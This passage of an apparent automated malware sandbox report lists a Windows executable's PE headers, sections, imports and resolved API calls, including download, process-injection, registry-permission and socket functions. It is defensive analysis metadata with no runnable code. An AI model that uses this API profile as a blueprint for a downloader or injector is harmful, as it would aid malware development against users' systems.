3958 "address": "0x42a048"
3959 },
3960 {
3961 "name": "FlushFileBuffers",
3962 "address": "0x42a04c"
3963 },
3964 {
3965 "name": "EncodePointer",
3966 "address": "0x42a050"
3967 },
3968 {
3969 "name": "DecodePointer",
3970 "address": "0x42a054"
3971 },
3972 {
3973 "name": "RaiseException",
3974 "address": "0x42a058"
3975 },
3976 {
3977 "name": "RtlUnwind",
3978 "address": "0x42a05c"
3979 },
3980 {
3981 "name": "GetCommandLineW",
3982 "address": "0x42a060"
3983 },
3984 {
3985 "name": "IsProcessorFeaturePresent",
3986 "address": "0x42a064"
3987 },
3988 {
3989 "name": "GetLastError",
3990 "address": "0x42a068"
3991 },
3992 {
3993 "name": "HeapAlloc",
3994 "address": "0x42a06c"
3995 },
3996 {
3997 "name": "HeapFree",
3998 "address": "0x42a070"
3999 },
4000 {
4001 "name": "GetModuleHandleExW",
4002 "address": "0x42a074"
4003 },
4004 {
4005 "name": "AreFileApisANSI",
4006 "address": "0x42a078"
4007 },
4008 {
4009 "name": "MultiByteToWideChar",
4010 "address": "0x42a07c"
4011 },
4012 {
4013 "name": "WideCharToMultiByte",
4014 "address": "0x42a080"
4015 },
4016 {
4017 "name": "HeapSize",
4018 "address": "0x42a084"
4019 },
4020 {
4021 "name": "IsDebuggerPresent",
4022 "address": "0x42a088"
4023 },
4024 {
4025 "name": "EnterCriticalSection",
4026 "address": "0x42a08c"
4027 },
4028 {
4029 "name": "LeaveCriticalSection",
4030 "address": "0x42a090"
4031 },
4032 {
4033 "name": "SetLastError",
4034 "address": "0x42a094"
4035 },
4036 {
4037 "name": "GetCurrentThread",
4038 "address": "0x42a098"
4039 },
4040 {
4041 "name": "GetCurrentThreadId",
4042 "address": "0x42a09c"
4043 },
4044 {
4045 "name": "GetProcessHeap",
4046 "address": "0x42a0a0"
4047 },
4048 {
4049 "name": "GetStdHandle",
4050 "address": "0x42a0a4"
4051 },
4052 {
4053 "name": "GetFileType",
4054 "address": "0x42a0a8"
4055 },
4056 {
4057 "name": "DeleteCriticalSection",
4058 "address": "0x42a0ac"
4059 },
4060 {
4061 "name": "GetStartupInfoW",
4062 "address": "0x42a0b0"
4063 },
4064 {
4065 "name": "GetModuleFileNameW",
4066 "address": "0x42a0b4"
4067 },
4068 {
4069 "name": "WriteFile",
4070 "address": "0x42a0b8"
4071 },
4072 {
4073 "name": "QueryPerformanceCounter",
4074 "address": "0x42a0bc"
4075 },
4076 {
4077 "name": "GetCurrentProcessId",
4078 "address": "0x42a0c0"
4079 },
4080 {
4081 "name": "GetSystemTimeAsFileTime",
4082 "address": "0x42a0c4"
4083 },
4084 {
4085 "name": "GetEnvironmentStringsW",
4086 "address": "0x42a0c8"
4087 },
4088 {
4089 "name": "FreeEnvironmentStringsW",
4090 "address": "0x42a0cc"
4091 },
4092 {
4093 "name": "UnhandledExceptionFilter",
4094 "address": "0x42a0d0"
4095 },
4096 {
4097 "name": "SetUnhandledExceptionFilter",
4098 "address": "0x42a0d4"
4099 },
4100 {
4101 "name": "InitializeCriticalSectionAndSpinCount",
4102 "address": "0x42a0d8"
4103 },
4104 {
4105 "name": "CreateEventW",
4106 "address": "0x42a0dc"
4107 },
4108 {
4109 "name": "Sleep",
4110 "address": "0x42a0e0"
4111 },
4112 {
4113 "name": "GetCurrentProcess",
4114 "address": "0x42a0e4"
4115 },
4116 {
4117 "name": "TerminateProcess",
4118 "address": "0x42a0e8"
4119 },
4120 {
4121 "name": "TlsAlloc",
4122 "address": "0x42a0ec"
4123 },
4124 {
4125 "name": "TlsGetValue",
4126 "address": "0x42a0f0"
4127 },
4128 {
4129 "name": "TlsSetValue",
4130 "address": "0x42a0f4"
4131 },
4132 {
4133 "name": "TlsFree",
4134 "address": "0x42a0f8"
4135 },
4136 {
4137 "name": "CreateSemaphoreW",
4138 "address": "0x42a0fc"
4139 },
4140 {
4141 "name": "SetConsoleCtrlHandler",
4142 "address": "0x42a100"
4143 },
4144 {
4145 "name": "GetDateFormatW",
4146 "address": "0x42a104"
4147 },
4148 {
4149 "name": "GetTimeFormatW",
4150 "address": "0x42a108"
4151 },
4152 {
4153 "name": "CompareStringW",
4154 "address": "0x42a10c"
4155 },
4156 {
4157 "name": "LCMapStringW",
4158 "address": "0x42a110"
4159 },
4160 {
4161 "name": "GetLocaleInfoW",
4162 "address": "0x42a114"
4163 },
4164 {
4165 "name": "IsValidLocale",
4166 "address": "0x42a118"
4167 },
4168 {
4169 "name": "GetUserDefaultLCID",
4170 "address": "0x42a11c"
4171 },
4172 {
4173 "name": "EnumSystemLocalesW",
4174 "address": "0x42a120"
4175 },
4176 {
4177 "name": "FatalAppExitA",
4178 "address": "0x42a124"
4179 },
4180 {
4181 "name": "FreeLibrary",
4182 "address": "0x42a128"
4183 },
4184 {
4185 "name": "LoadLibraryExW",
4186 "address": "0x42a12c"
4187 },
4188 {
4189 "name": "IsValidCodePage",
4190 "address": "0x42a130"
4191 },
4192 {
4193 "name": "GetACP",
4194 "address": "0x42a134"
4195 },
4196 {
4197 "name": "GetOEMCP",
4198 "address": "0x42a138"
4199 },
4200 {
4201 "name": "GetCPInfo",
4202 "address": "0x42a13c"
4203 },
4204 {
4205 "name": "HeapReAlloc",
4206 "address": "0x42a140"
4207 },
4208 {
4209 "name": "GetConsoleCP",
4210 "address": "0x42a144"
4211 },
4212 {
4213 "name": "GetConsoleMode",
4214 "address": "0x42a148"
4215 },
4216 {
4217 "name": "SetFilePointerEx",
4218 "address": "0x42a14c"
4219 },
4220 {
4221 "name": "OutputDebugStringW",
4222 "address": "0x42a150"
4223 },
4224 {
4225 "name": "GetStringTypeW",
4226 "address": "0x42a154"
4227 },
4228 {
4229 "name": "CreateFileW",
4230 "address": "0x42a158"
4231 }
4232 ],
4233 "dll": "KERNEL32.dll"
4234 },
4235 {
4236 "imports": [
4237 {
4238 "name": "GetMonitorInfoA",
4239 "address": "0x42a160"
4240 },
4241 {
4242 "name": "ScrollWindow",
4243 "address": "0x42a164"
4244 },
4245 {
4246 "name": "MenuItemFromPoint",
4247 "address": "0x42a168"
4248 },
4249 {
4250 "name": "NotifyWinEvent",
4251 "address": "0x42a16c"
4252 }
4253 ],
4254 "dll": "USER32.dll"
4255 }
4256 ],
4257 "digital_signers": null,
4258 "exported_dll_name": "debev.exe",
4259 "actual_checksum": "0x00053c07",
4260 "overlay": {
4261 "size": "0x000066e8",
4262 "offset": "0x00041800"
4263 },
4264 "imagebase": "0x00400000",
4265 "reported_checksum": "0x00053c07",
4266 "icon_hash": null,
4267 "entrypoint": "0x00404c45",
4268 "timestamp": "2018-01-25 07:31:42",
4269 "osversion": "5.1",
4270 "sections": [
4271 {
4272 "name": ".text",
4273 "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
4274 "virtual_address": "0x00001000",
4275 "size_of_data": "0x00028600",
4276 "entropy": "6.66",
4277 "raw_address": "0x00000400",
4278 "virtual_size": "0x000285e9",
4279 "characteristics_raw": "0x60000020"
4280 },
4281 {
4282 "name": ".rdata",
4283 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
4284 "virtual_address": "0x0002a000",
4285 "size_of_data": "0x00011000",
4286 "entropy": "6.20",
4287 "raw_address": "0x00028a00",
4288 "virtual_size": "0x00010e4e",
4289 "characteristics_raw": "0x40000040"
4290 },
4291 {
4292 "name": ".data",
4293 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
4294 "virtual_address": "0x0003b000",
4295 "size_of_data": "0x00001e00",
4296 "entropy": "3.07",
4297 "raw_address": "0x00039a00",
4298 "virtual_size": "0x00804ea0",
4299 "characteristics_raw": "0xc0000040"
4300 },
4301 {
4302 "name": ".rsrc",
4303 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
4304 "virtual_address": "0x00840000",
4305 "size_of_data": "0x00003e00",
4306 "entropy": "5.96",
4307 "raw_address": "0x0003b800",
4308 "virtual_size": "0x00003c20",
4309 "characteristics_raw": "0x40000040"
4310 },
4311 {
4312 "name": ".reloc",
4313 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
4314 "virtual_address": "0x00844000",
4315 "size_of_data": "0x00002200",
4316 "entropy": "6.61",
4317 "raw_address": "0x0003f600",
4318 "virtual_size": "0x000021a8",
4319 "characteristics_raw": "0x42000040"
4320 }
4321 ],
4322 "resources": [],
4323 "dirents": [
4324 {
4325 "virtual_address": "0x0003a5b0",
4326 "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
4327 "size": "0x00000049"
4328 },
4329 {
4330 "virtual_address": "0x0003a5fc",
4331 "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
4332 "size": "0x0000003c"
4333 },
4334 {
4335 "virtual_address": "0x00840000",
4336 "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
4337 "size": "0x00003c20"
4338 },
4339 {
4340 "virtual_address": "0x00000000",
4341 "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
4342 "size": "0x00000000"
4343 },
4344 {
4345 "virtual_address": "0x00000000",
4346 "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
4347 "size": "0x00000000"
4348 },
4349 {
4350 "virtual_address": "0x00844000",
4351 "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
4352 "size": "0x000021a8"
4353 },
4354 {
4355 "virtual_address": "0x0002a1d0",
4356 "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
4357 "size": "0x00000038"
4358 },
4359 {
4360 "virtual_address": "0x00000000",
4361 "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
4362 "size": "0x00000000"
4363 },
4364 {
4365 "virtual_address": "0x00000000",
4366 "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
4367 "size": "0x00000000"
4368 },
4369 {
4370 "virtual_address": "0x00000000",
4371 "name": "IMAGE_DIRECTORY_ENTRY_TLS",
4372 "size": "0x00000000"
4373 },
4374 {
4375 "virtual_address": "0x00000000",
4376 "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
4377 "size": "0x00000000"
4378 },
4379 {
4380 "virtual_address": "0x00000000",
4381 "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
4382 "size": "0x00000000"
4383 },
4384 {
4385 "virtual_address": "0x0002a000",
4386 "name": "IMAGE_DIRECTORY_ENTRY_IAT",
4387 "size": "0x00000174"
4388 },
4389 {
4390 "virtual_address": "0x00000000",
4391 "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
4392 "size": "0x00000000"
4393 },
4394 {
4395 "virtual_address": "0x00000000",
4396 "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
4397 "size": "0x00000000"
4398 },
4399 {
4400 "virtual_address": "0x00000000",
4401 "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
4402 "size": "0x00000000"
4403 }
4404 ],
4405 "exports": [
4406 {
4407 "ordinal": 1,
4408 "name": "MyFunc165@@4",
4409 "address": "0x4010e4"
4410 }
4411 ],
4412 "guest_signers": {},
4413 "imphash": "84066f737849606bdb2e184d6e8ebf64",
4414 "icon_fuzzy": null,
4415 "icon": null,
4416 "pdbpath": "C:\\nane-zesi.pdb\\x00_server\\runtime\\crypt\\tmp_922572135\\bin\\debev.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\xc7C\\x00\\xd4\\x93C\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01",
4417 "imported_dll_count": 2,
4418 "versioninfo": []
4419 }
4420}
4421
4422[*] Resolved APIs: [
4423 "kernel32.dll.FlsAlloc",
4424 "kernel32.dll.FlsFree",
4425 "kernel32.dll.FlsGetValue",
4426 "kernel32.dll.FlsSetValue",
4427 "kernel32.dll.InitializeCriticalSectionEx",
4428 "kernel32.dll.CreateEventExW",
4429 "kernel32.dll.CreateSemaphoreExW",
4430 "kernel32.dll.SetThreadStackGuarantee",
4431 "kernel32.dll.CreateThreadpoolTimer",
4432 "kernel32.dll.SetThreadpoolTimer",
4433 "kernel32.dll.WaitForThreadpoolTimerCallbacks",
4434 "kernel32.dll.CloseThreadpoolTimer",
4435 "kernel32.dll.CreateThreadpoolWait",
4436 "kernel32.dll.SetThreadpoolWait",
4437 "kernel32.dll.CloseThreadpoolWait",
4438 "kernel32.dll.FlushProcessWriteBuffers",
4439 "kernel32.dll.FreeLibraryWhenCallbackReturns",
4440 "kernel32.dll.GetCurrentProcessorNumber",
4441 "kernel32.dll.GetLogicalProcessorInformation",
4442 "kernel32.dll.CreateSymbolicLinkW",
4443 "kernel32.dll.EnumSystemLocalesEx",
4444 "kernel32.dll.CompareStringEx",
4445 "kernel32.dll.GetDateFormatEx",
4446 "kernel32.dll.GetLocaleInfoEx",
4447 "kernel32.dll.GetTimeFormatEx",
4448 "kernel32.dll.GetUserDefaultLocaleName",
4449 "kernel32.dll.IsValidLocaleName",
4450 "kernel32.dll.LCMapStringEx",
4451 "kernel32.dll.GetTickCount64",
4452 "kernel32.dll.VirtualProtect",
4453 "kernel32.dll.LoadLibraryA",
4454 "kernel32.dll.VirtualAlloc",
4455 "kernel32.dll.VirtualFree",
4456 "kernel32.dll.GetVersionExA",
4457 "kernel32.dll.TerminateProcess",
4458 "kernel32.dll.ExitProcess",
4459 "kernel32.dll.SetErrorMode",
4460 "advapi32.dll.GetUserNameA",
4461 "kernel32.dll.AddAtomA",
4462 "kernel32.dll.CloseHandle",
4463 "kernel32.dll.CreateDirectoryA",
4464 "kernel32.dll.CreateFileA",
4465 "kernel32.dll.CreateProcessA",
4466 "kernel32.dll.FindAtomA",
4467 "kernel32.dll.FreeLibrary",
4468 "kernel32.dll.GetAtomNameA",
4469 "kernel32.dll.GetComputerNameA",
4470 "kernel32.dll.GetFileAttributesA",
4471 "kernel32.dll.GetFileSize",
4472 "kernel32.dll.GetModuleFileNameA",
4473 "kernel32.dll.GetModuleHandleA",
4474 "kernel32.dll.GetProcAddress",
4475 "kernel32.dll.GetSystemDirectoryA",
4476 "kernel32.dll.GetSystemInfo",
4477 "kernel32.dll.GetTempPathA",
4478 "kernel32.dll.GetVolumeInformationA",
4479 "kernel32.dll.SetUnhandledExceptionFilter",
4480 "kernel32.dll.Sleep",
4481 "kernel32.dll.WaitForSingleObject",
4482 "kernel32.dll.WriteFile",
4483 "msvcrt.dll._itoa",
4484 "msvcrt.dll._strlwr",
4485 "msvcrt.dll.__getmainargs",
4486 "msvcrt.dll.__p__environ",
4487 "msvcrt.dll.__p__fmode",
4488 "msvcrt.dll.__set_app_type",
4489 "msvcrt.dll._cexit",
4490 "msvcrt.dll._iob",
4491 "msvcrt.dll._onexit",
4492 "msvcrt.dll._setmode",
4493 "msvcrt.dll.abort",
4494 "msvcrt.dll.atexit",
4495 "msvcrt.dll.atoi",
4496 "msvcrt.dll.exit",
4497 "msvcrt.dll.fclose",
4498 "msvcrt.dll.fflush",
4499 "msvcrt.dll.fopen",
4500 "msvcrt.dll.fprintf",
4501 "msvcrt.dll.fread",
4502 "msvcrt.dll.free",
4503 "msvcrt.dll.fwrite",
4504 "msvcrt.dll.malloc",
4505 "msvcrt.dll.memcpy",
4506 "msvcrt.dll.memmove",
4507 "msvcrt.dll.memset",
4508 "msvcrt.dll.signal",
4509 "msvcrt.dll.strcat",
4510 "msvcrt.dll.strcmp",
4511 "msvcrt.dll.strcpy",
4512 "msvcrt.dll.strlen",
4513 "msvcrt.dll.strncat",
4514 "shell32.dll.ShellExecuteExA",
4515 "user32.dll.GetSystemMetrics",
4516 "wsock32.dll.WSACleanup",
4517 "wsock32.dll.WSAStartup",
4518 "wsock32.dll.closesocket",
4519 "wsock32.dll.connect",
4520 "wsock32.dll.gethostbyname",
4521 "wsock32.dll.htons",
4522 "wsock32.dll.inet_addr",
4523 "wsock32.dll.inet_ntoa",
4524 "wsock32.dll.recv",
4525 "wsock32.dll.send",
4526 "wsock32.dll.socket",
4527 "msvcr100.dll.atexit",
4528 "shell32.dll.#680",
4529 "kernel32.dll.GetNativeSystemInfo",
4530 "urlmon.dll.URLDownloadToFileA",
4531 "rasapi32.dll.RasConnectionNotificationW",
4532 "sechost.dll.NotifyServiceStatusChangeA",
4533 "cryptbase.dll.SystemFunction036",
4534 "urlmon.dll.CoInternetCreateSecurityManager",
4535 "urlmon.dll.CoInternetCreateZoneManager",
4536 "urlmon.dll.CoInternetIsFeatureEnabledForUrl",
4537 "kernel32.dll.SortGetHandle",
4538 "kernel32.dll.SortCloseHandle",
4539 "uxtheme.dll.ThemeInitApiHook",
4540 "user32.dll.IsProcessDPIAware",
4541 "kernel32.dll.HeapAlloc",
4542 "kernel32.dll.HeapFree",
4543 "kernel32.dll.GetTickCount",
4544 "ws2_32.dll.#10",
4545 "ws2_32.dll.#151",
4546 "ws2_32.dll.#115",
4547 "ws2_32.dll.#19",
4548 "ws2_32.dll.#4",
4549 "ws2_32.dll.#21",
4550 "ws2_32.dll.#2",
4551 "ws2_32.dll.#13",
4552 "ws2_32.dll.#1",
4553 "ws2_32.dll.#6",
4554 "ws2_32.dll.#8",
4555 "ws2_32.dll.#57",
4556 "ws2_32.dll.#23",
4557 "ws2_32.dll.#18",
4558 "ws2_32.dll.#16",
4559 "ws2_32.dll.#15",
4560 "ws2_32.dll.#9",
4561 "ws2_32.dll.#20",
4562 "ws2_32.dll.#51",
4563 "ws2_32.dll.#12",
4564 "ws2_32.dll.#52",
4565 "ws2_32.dll.#11",
4566 "ws2_32.dll.#5",
4567 "ws2_32.dll.#3",
4568 "dbghelp.dll.StackWalk64",
4569 "kernel32.dll.GetCurrentProcess",
4570 "kernel32.dll.lstrcmpiA",
4571 "kernel32.dll.lstrlenA",
4572 "kernel32.dll.lstrcpynA",
4573 "kernel32.dll.InterlockedExchange",
4574 "kernel32.dll.GetCurrentThreadId",
4575 "kernel32.dll.GetOverlappedResult",
4576 "kernel32.dll.GetLastError",
4577 "kernel32.dll.ReadFile",
4578 "kernel32.dll.DisconnectNamedPipe",
4579 "kernel32.dll.ConnectNamedPipe",
4580 "kernel32.dll.CreateNamedPipeA",
4581 "kernel32.dll.GetEnvironmentVariableA",
4582 "kernel32.dll.DeleteFileA",
4583 "kernel32.dll.IsBadWritePtr",
4584 "kernel32.dll.IsBadCodePtr",
4585 "kernel32.dll.lstrcpyA",
4586 "kernel32.dll.lstrcmpA",
4587 "kernel32.dll.IsBadReadPtr",
4588 "kernel32.dll.WriteProcessMemory",
4589 "kernel32.dll.VirtualAllocEx",
4590 "kernel32.dll.SetFilePointer",
4591 "kernel32.dll.SetFileAttributesA",
4592 "kernel32.dll.GetDiskFreeSpaceA",
4593 "kernel32.dll.GetWindowsDirectoryA",
4594 "kernel32.dll.LocalFree",
4595 "kernel32.dll.GetFileAttributesExA",
4596 "kernel32.dll.LocalAlloc",
4597 "kernel32.dll.SystemTimeToFileTime",
4598 "kernel32.dll.GetSystemTime",
4599 "kernel32.dll.DeviceIoControl",
4600 "kernel32.dll.CreateFileW",
4601 "kernel32.dll.ResumeThread",
4602 "kernel32.dll.SetThreadContext",
4603 "kernel32.dll.GetThreadContext",
4604 "kernel32.dll.lstrcatA",
4605 "kernel32.dll.CreateThread",
4606 "kernel32.dll.GetDriveTypeA",
4607 "kernel32.dll.GetCommandLineA",
4608 "kernel32.dll.InterlockedIncrement",
4609 "kernel32.dll.GetLocalTime",
4610 "kernel32.dll.GetTimeZoneInformation",
4611 "kernel32.dll.FileTimeToLocalFileTime",
4612 "kernel32.dll.FileTimeToSystemTime",
4613 "kernel32.dll.InterlockedDecrement",
4614 "kernel32.dll.HeapSize",
4615 "kernel32.dll.GetSystemTimeAsFileTime",
4616 "kernel32.dll.MultiByteToWideChar",
4617 "kernel32.dll.lstrlenW",
4618 "kernel32.dll.GetStartupInfoW",
4619 "kernel32.dll.GetProcessHeap",
4620 "kernel32.dll.HeapReAlloc",
4621 "kernel32.dll.CreateEventA",
4622 "user32.dll.wsprintfA",
4623 "user32.dll.CharToOemA",
4624 "advapi32.dll.ConvertSidToStringSidA",
4625 "advapi32.dll.AllocateAndInitializeSid",
4626 "advapi32.dll.CreateProcessWithLogonW",
4627 "advapi32.dll.RegCreateKeyExA",
4628 "advapi32.dll.StartServiceCtrlDispatcherA",
4629 "advapi32.dll.RegisterServiceCtrlHandlerA",
4630 "advapi32.dll.SetServiceStatus",
4631 "advapi32.dll.RegDeleteValueA",
4632 "advapi32.dll.RegGetKeySecurity",
4633 "advapi32.dll.RegSetKeySecurity",
4634 "advapi32.dll.RegSetValueExA",
4635 "advapi32.dll.GetLengthSid",
4636 "advapi32.dll.GetFileSecurityA",
4637 "advapi32.dll.GetSecurityDescriptorOwner",
4638 "advapi32.dll.EqualSid",
4639 "advapi32.dll.InitializeSecurityDescriptor",
4640 "advapi32.dll.SetSecurityDescriptorOwner",
4641 "advapi32.dll.SetFileSecurityA",
4642 "advapi32.dll.GetSecurityDescriptorDacl",
4643 "advapi32.dll.GetAce",
4644 "advapi32.dll.DeleteAce",
4645 "advapi32.dll.SetSecurityDescriptorDacl",
4646 "advapi32.dll.RegQueryValueExA",
4647 "advapi32.dll.RegEnumKeyA",
4648 "advapi32.dll.RegOpenKeyExA",
4649 "advapi32.dll.RegEnumValueA",
4650 "advapi32.dll.GetUserNameW",
4651 "advapi32.dll.LookupAccountNameW",
4652 "advapi32.dll.LookupAccountNameA",
4653 "advapi32.dll.RegCloseKey",
4654 "advapi32.dll.CheckTokenMembership",
4655 "advapi32.dll.FreeSid",
4656 "shell32.dll.ShellExecuteA",
4657 "shell32.dll.ShellExecuteExW",
4658 "oleaut32.dll.#150",
4659 "kernel32.dll.GetSystemWow64DirectoryA",
4660 "ntdll.dll._allmul",
4661 "ole32.dll.OleInitialize",
4662 "ole32.dll.CreateBindCtx",
4663 "ole32.dll.CoTaskMemAlloc",
4664 "propsys.dll.PSCreateMemoryPropertyStore",
4665 "propsys.dll.PSPropertyBag_WriteDWORD",
4666 "ole32.dll.CoGetApartmentType",
4667 "ole32.dll.CoRegisterInitializeSpy",
4668 "ole32.dll.CoTaskMemFree",
4669 "comctl32.dll.#236",
4670 "oleaut32.dll.#6",
4671 "ole32.dll.CoGetMalloc",
4672 "propsys.dll.PSPropertyBag_ReadDWORD",
4673 "propsys.dll.PSPropertyBag_ReadGUID",
4674 "comctl32.dll.#320",
4675 "comctl32.dll.#324",
4676 "comctl32.dll.#323",
4677 "advapi32.dll.RegEnumKeyW",
4678 "advapi32.dll.OpenThreadToken",
4679 "ole32.dll.StringFromGUID2",
4680 "apphelp.dll.ApphelpCheckShellObject",
4681 "ole32.dll.CoCreateInstance",
4682 "urlmon.dll.CreateUri",
4683 "kernel32.dll.InitializeSRWLock",
4684 "kernel32.dll.AcquireSRWLockExclusive",
4685 "kernel32.dll.AcquireSRWLockShared",
4686 "kernel32.dll.ReleaseSRWLockExclusive",
4687 "kernel32.dll.ReleaseSRWLockShared",
4688 "comctl32.dll.#328",
4689 "comctl32.dll.#334",
4690 "oleaut32.dll.#2",
4691 "shell32.dll.#102",
4692 "propsys.dll.PSPropertyBag_ReadStrAlloc",
4693 "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
4694 "setupapi.dll.CM_Get_Device_Interface_List_ExW",
4695 "ole32.dll.CoInitializeEx",
4696 "comctl32.dll.#332",
4697 "advapi32.dll.SetEntriesInAclW",
4698 "ntmarta.dll.GetMartaExtensionInterface",
4699 "comctl32.dll.#386",
4700 "advapi32.dll.IsTextUnicode",
4701 "comctl32.dll.#338",
4702 "ole32.dll.CoUninitialize",
4703 "sechost.dll.ConvertSidToStringSidW",
4704 "profapi.dll.#104",
4705 "propsys.dll.#430",
4706 "advapi32.dll.RegOpenKeyExW",
4707 "advapi32.dll.RegGetValueW",
4708 "ole32.dll.CoTaskMemRealloc",
4709 "propsys.dll.InitPropVariantFromStringAsVector",
4710 "propsys.dll.PSCoerceToCanonicalValue",
4711 "propsys.dll.PropVariantToStringAlloc",
4712 "ole32.dll.PropVariantClear",
4713 "ole32.dll.CoAllowSetForegroundWindow",
4714 "shell32.dll.SHGetFolderPathW",
4715 "advapi32.dll.SaferGetPolicyInformation",
4716 "ntdll.dll.RtlDllShutdownInProgress",
4717 "comctl32.dll.#329",
4718 "ole32.dll.OleUninitialize",
4719 "ole32.dll.CoRevokeInitializeSpy",
4720 "comctl32.dll.#388",
4721 "oleaut32.dll.#500",
4722 "advapi32.dll.UnregisterTraceGuids",
4723 "comctl32.dll.#321",
4724 "kernel32.dll.SetThreadUILanguage",
4725 "kernel32.dll.CopyFileExW",
4726 "kernel32.dll.IsDebuggerPresent",
4727 "kernel32.dll.SetConsoleInputExeNameW",
4728 "comctl32.dll.#339",
4729 "oleaut32.dll.#9",
4730 "advapi32.dll.RegQueryValueW",
4731 "linkinfo.dll.CreateLinkInfoW",
4732 "user32.dll.IsCharAlphaW",
4733 "user32.dll.CharPrevW",
4734 "ntshrui.dll.GetNetResourceFromLocalPathW",
4735 "srvcli.dll.NetShareEnum",
4736 "cscapi.dll.CscNetApiGetInterface",
4737 "slc.dll.SLGetWindowsInformationDWORD",
4738 "shlwapi.dll.PathRemoveFileSpecW",
4739 "linkinfo.dll.DestroyLinkInfo",
4740 "ole32.dll.NdrOleInitializeExtension",
4741 "ole32.dll.CoGetClassObject",
4742 "ole32.dll.CoGetMarshalSizeMax",
4743 "ole32.dll.CoMarshalInterface",
4744 "ole32.dll.CoUnmarshalInterface",
4745 "ole32.dll.StringFromIID",
4746 "ole32.dll.CoGetPSClsid",
4747 "ole32.dll.CoReleaseMarshalData",
4748 "ole32.dll.DcomChannelSetHResult",
4749 "sspicli.dll.GetUserNameExW",
4750 "xmllite.dll.CreateXmlWriter",
4751 "xmllite.dll.CreateXmlWriterOutputWithEncodingName",
4752 "netutils.dll.NetApiBufferFree",
4753 "rasmontr.dll.InitHelperDll",
4754 "nshwfp.dll.InitHelperDll",
4755 "sechost.dll.LookupAccountNameLocalW"
4756]
4757
4758[*] Static Analysis: {
4759 "pe": {
4760 "peid_signatures": null,
4761 "imports": [
4762 {
4763 "imports": [
4764 {
4765 "name": "GetProcAddress",
4766 "address": "0x42a000"
4767 },
4768 {
4769 "name": "LocalAlloc",
4770 "address": "0x42a004"
4771 },
4772 {
4773 "name": "GetBinaryTypeA",
4774 "address": "0x42a008"
4775 },
4776 {
4777 "name": "ExitProcess",
4778 "address": "0x42a00c"
4779 },
4780 {
4781 "name": "DebugActiveProcessStop",
4782 "address": "0x42a010"
4783 },
4784 {
4785 "name": "UnlockFile",
4786 "address": "0x42a014"
4787 },
4788 {
4789 "name": "CloseHandle",
4790 "address": "0x42a018"
4791 },
4792 {
4793 "name": "GetTickCount",
4794 "address": "0x42a01c"
4795 },
4796 {
4797 "name": "lstrlenW",
4798 "address": "0x42a020"
4799 },
4800 {
4801 "name": "GetModuleHandleW",
4802 "address": "0x42a024"
4803 },
4804 {
4805 "name": "GetPrivateProfileIntA",
4806 "address": "0x42a028"
4807 },
4808 {
4809 "name": "GetNumberFormatW",
4810 "address": "0x42a02c"
4811 },
4812 {
4813 "name": "PeekConsoleInputA",
4814 "address": "0x42a030"
4815 },
4816 {
4817 "name": "CreateToolhelp32Snapshot",
4818 "address": "0x42a034"
4819 },
4820 {
4821 "name": "Module32First",
4822 "address": "0x42a038"
4823 },
4824 {
4825 "name": "WriteConsoleW",
4826 "address": "0x42a03c"
4827 },
4828 {
4829 "name": "SetStdHandle",
4830 "address": "0x42a040"
4831 },
4832 {
4833 "name": "ReadConsoleW",
4834 "address": "0x42a044"
4835 },
4836 {
4837 "name": "ReadFile",
4838 "address": "0x42a048"
4839 },
4840 {
4841 "name": "FlushFileBuffers",
4842 "address": "0x42a04c"
4843 },
4844 {
4845 "name": "EncodePointer",
4846 "address": "0x42a050"
4847 },
4848 {
4849 "name": "DecodePointer",
4850 "address": "0x42a054"
4851 },
4852 {
4853 "name": "RaiseException",
4854 "address": "0x42a058"
4855 },
4856 {
4857 "name": "RtlUnwind",
4858 "address": "0x42a05c"
4859 },
4860 {
4861 "name": "GetCommandLineW",
4862 "address": "0x42a060"
4863 },
4864 {
4865 "name": "IsProcessorFeaturePresent",
4866 "address": "0x42a064"
4867 },
4868 {
4869 "name": "GetLastError",
4870 "address": "0x42a068"
4871 },
4872 {
4873 "name": "HeapAlloc",
4874 "address": "0x42a06c"
4875 },
4876 {
4877 "name": "HeapFree",
4878 "address": "0x42a070"
4879 },
4880 {
4881 "name": "GetModuleHandleExW",
4882 "address": "0x42a074"
4883 },
4884 {
4885 "name": "AreFileApisANSI",
4886 "address": "0x42a078"
4887 },
4888 {
4889 "name": "MultiByteToWideChar",
4890 "address": "0x42a07c"
4891 },
4892 {
4893 "name": "WideCharToMultiByte",
4894 "address": "0x42a080"
4895 },
4896 {
4897 "name": "HeapSize",
4898 "address": "0x42a084"
4899 },
4900 {
4901 "name": "IsDebuggerPresent",
4902 "address": "0x42a088"
4903 },
4904 {
4905 "name": "EnterCriticalSection",
4906 "address": "0x42a08c"
4907 },
4908 {
4909 "name": "LeaveCriticalSection",
4910 "address": "0x42a090"
4911 },
4912 {
4913 "name": "SetLastError",
4914 "address": "0x42a094"
4915 },
4916 {
4917 "name": "GetCurrentThread",
4918 "address": "0x42a098"
